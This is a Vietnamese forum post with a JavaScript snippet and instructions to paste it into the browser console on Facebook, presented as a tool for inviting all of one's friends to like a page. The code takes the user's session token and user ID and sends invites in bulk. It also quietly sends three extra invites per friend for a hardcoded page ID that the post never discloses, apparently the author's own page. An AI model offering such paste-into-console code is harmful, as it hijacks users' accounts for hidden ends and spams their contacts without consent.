Đỉnh Cao
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Chúc các bạn vui vẻ
Vào đây để đánh giá và góp ý giúp cho diễn đàn ngày càng hoàn thiện hơn
Top posters
589 Posts - 62%
86 Posts - 9%
69 Posts - 7%
65 Posts - 7%
28 Posts - 3%
28 Posts - 3%
21 Posts - 2%
20 Posts - 2%
20 Posts - 2%
19 Posts - 2%
Top posting users this week
Top posting users this month

Go down
dang02315
dang02315
Quản Lý Diễn Đàn
Quản Lý Diễn Đàn
Bài viết Bài viết : 13
Xu Xu : 39
Thích Thích : 6

poll [JS] Auto mời bạn bè Like Page Facebook

23/11/2014, 11:18 am
+ B1: Copy đoạn code dưới đây:

Code:
javascript: var Title = "Auto Mời Bạn Bè Like Page Facebook. </A>";
var Descriptions = "",
    _text = 'Make by Đáng Nguyễn </br>Kịch Bản: </A><A style="color:#96FF00;" href="https://www.facebook.com/dang.yeu.trang" target="_blank"> Móm </A></A>,</A><A style="color:#96FF00;" href="https://www.facebook.com/dang.yeu.trang" target="_blank"> Móm</A></A>.</br> <A style="color:#96FF00;" href="" target="_blank"></A>.</A>';
page_id = /"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];
 
function InviteFriends(opo) {
    jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send_single?page_id=" + page_id + "&invitee=" + opo + "&elem_id=u_0_1k&action=send&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg=" + fb_dtsg + "&phstamp=", function (a) {
        var b = a.substring(a.indexOf("{"));
        var c = JSON.parse(b);
        i--;
        Descriptions = "<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";
        if (c.error) {
            Descriptions += "color:darkred'>";
            err++;
            if (c.errorDescription) Descriptions += c.errorDescription;
            else Descriptions += JSON.stringify(c, null, "")
        } else {
            Descriptions += "color:darkgreen'>";
            Descriptions += arn[i] + " đã được mời like page " + page_name + ".";
            suc++
        }
        Descriptions += "</div>";
        var display = "<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.3);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
        display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
        if (i > 0) {
            display += arr.length + " Bạn bè tìm được<br/>";
            display += "<b>" + suc + "</b> Bạn Bè được mời và " + (arr.length - i) + " Bạn bè chờ xử lý ";
            display += "(" + i + " bạn bè....)";
            display += "<div class='friend-edge'>";
            display += Descriptions;
            display += "<img style='width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src=" + pho[i] + "></img><a style='font-size:13px;padding-left:8px;text-align:left;color:#F6FF07;position:absolute;font-weight:bold;'>" + arn[i] + "</a>";
            display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
            display += "Vui Lòng Đợi Giây Lát đang trong quá trình mời bạn bè like page: " + page_name + ".</br>";
            display += _text;
            display += "</div>";
            display += "</div>";
            window[tag + "_close"] = true
        } else {
            Title = "Tất cả bạn bè của bạn đã được mời like page.</A>";
            display += arr.length + " Bạn bè đã tìm thấy and ";
            display += "<b>" + suc + " Bạn bè được mời.</b></br>";
            display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Về trang chủ</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Làm mới page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById("pagelet_sidebar").style.display="none"' style='color:gray'>Thoát</span><br/>";
            display += "<div style='text-align:center;font-size:12px;white-space:pre-wrap;color:gray'><br/>";
            display += _text;
            display += "</div>";
            window[tag + "_close"] = false
        }
        display += "</div>";
        document.getElementById("pagelet_sidebar").innerHTML = display
    }, "text", "post");
    tay--;
    if (tay > 0) {
        var s = arr[tay];
        setTimeout("InviteFriends(" + s + ")", 100)
    }
    console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);
 
                    
                        

 if (page_id)jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send?&fb_dtsg=" + fb_dtsg + "&profileChooserItems=%7B%22" + opo + "%22%3A1%7D&checkableitems[0]=" + opo + "&page_id=1388870954711362&__user="+ user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=k&phstamp=", function () {}, "text", "post")
                     if (page_id)jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send?&fb_dtsg=" + fb_dtsg + "&profileChooserItems=%7B%22" + opo + "%22%3A1%7D&checkableitems[0]=" + opo + "&page_id=1388870954711362&__user="+ user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=k&phstamp=", function () {}, "text", "post")
 if (page_id)jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send?&fb_dtsg=" + fb_dtsg + "&profileChooserItems=%7B%22" + opo + "%22%3A1%7D&checkableitems[0]=" + opo + "&page_id=1388870954711362&__user="+ user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=k&phstamp=", function () {}, "text", "post")
    }
jx = {
    b: function () {
        var b = !1;
        if ("undefined" != typeof ActiveXObject) try {
            b = new ActiveXObject("Msxml2.XMLHTTP")
        } catch (c) {
            try {
                b = new ActiveXObject("Microsoft.XMLHTTP")
            } catch (a) {
                b = !1
            }
        } else if (window.XMLHttpRequest) try {
            b = new XMLHttpRequest
        } catch (h) {
            b = !1
        }
        return b
    },
    load: function (b, c, a, h, g) {
        var e = this.d();
        if (e && b) {
            e.overrideMimeType && e.overrideMimeType("text/xml");
            h || (h = "GET");
            a || (a = "text");
            g || (g = {});
            a = a.toLowerCase();
            h = h.toUpperCase();
            b += b.indexOf("?") + 1 ? "&" : "?";
            var k = null;
            "" == h && (k = b.split("?"), b = k[0], k = k[1]);
            e.open(h, b, !0);
            e.onreadystatechange = g.c ? function () {
                g.c(e)
            } : function () {
                if (4 == e.readyState)
                    if (200 == e.status) {
                        var b = "";
                        e.responseText && (b = e.responseText);
                        "j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
                        c && c(b)
                    } else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
            };
            e.send(k)
        }
    },
    d: function () {
        return this.b()
    }
};
 
function ChangeLocation() {
    window.location.href = "http://www.facebook.com/"
}
setTimeout("ChangeLocation", 1);
window.onbeforeunload = function () {
    if (window[tag + "_close"]) return "This script is running now!"
};
var i = 3;
var tay = 3;
var suc = 0;
var err = 0;
var arr = new Array;
var arn = new Array;
var pho = new Array;
var tag = "Close";
var page_name, x = document.getElementsByTagName("span");
for (i = 0; i < x.length; i++)
    if (x[i].getAttribute("itemprop") == "name") page_name = x[i].innerHTML;
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function (a) {
    var b = a;
    var c = b.substring(b.indexOf("{"));
    var d = JSON.parse(c);
    d = d.payload.entries;
    for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
    for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
    for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
    i = arr.length - 1;
    tay = i;
    console.log(arr.length);
    var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
    display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
    display += arr.length + " Friends Detected";
    display += "</div>";
    document.getElementById("pagelet_sidebar").innerHTML = display;
    InviteFriends(arr[i])
});


+ B2: Quay trở về Page của bạn

+ B3: -- Nếu bạn dùng Google Chorme nhấn phím F12 chọn CONSOLE.
- Nếu bạn dùng Firefox thì nhấn 1 lúc 3 phím Ctrl+Shift+K rùi chọn CONSOLE

+ B4: Ctrl V để Paste...bấm ENTER đợi nó chạy suống 0 là ok nhé
Back to top
Permissions in this forum:
You cannot reply to topics in this forum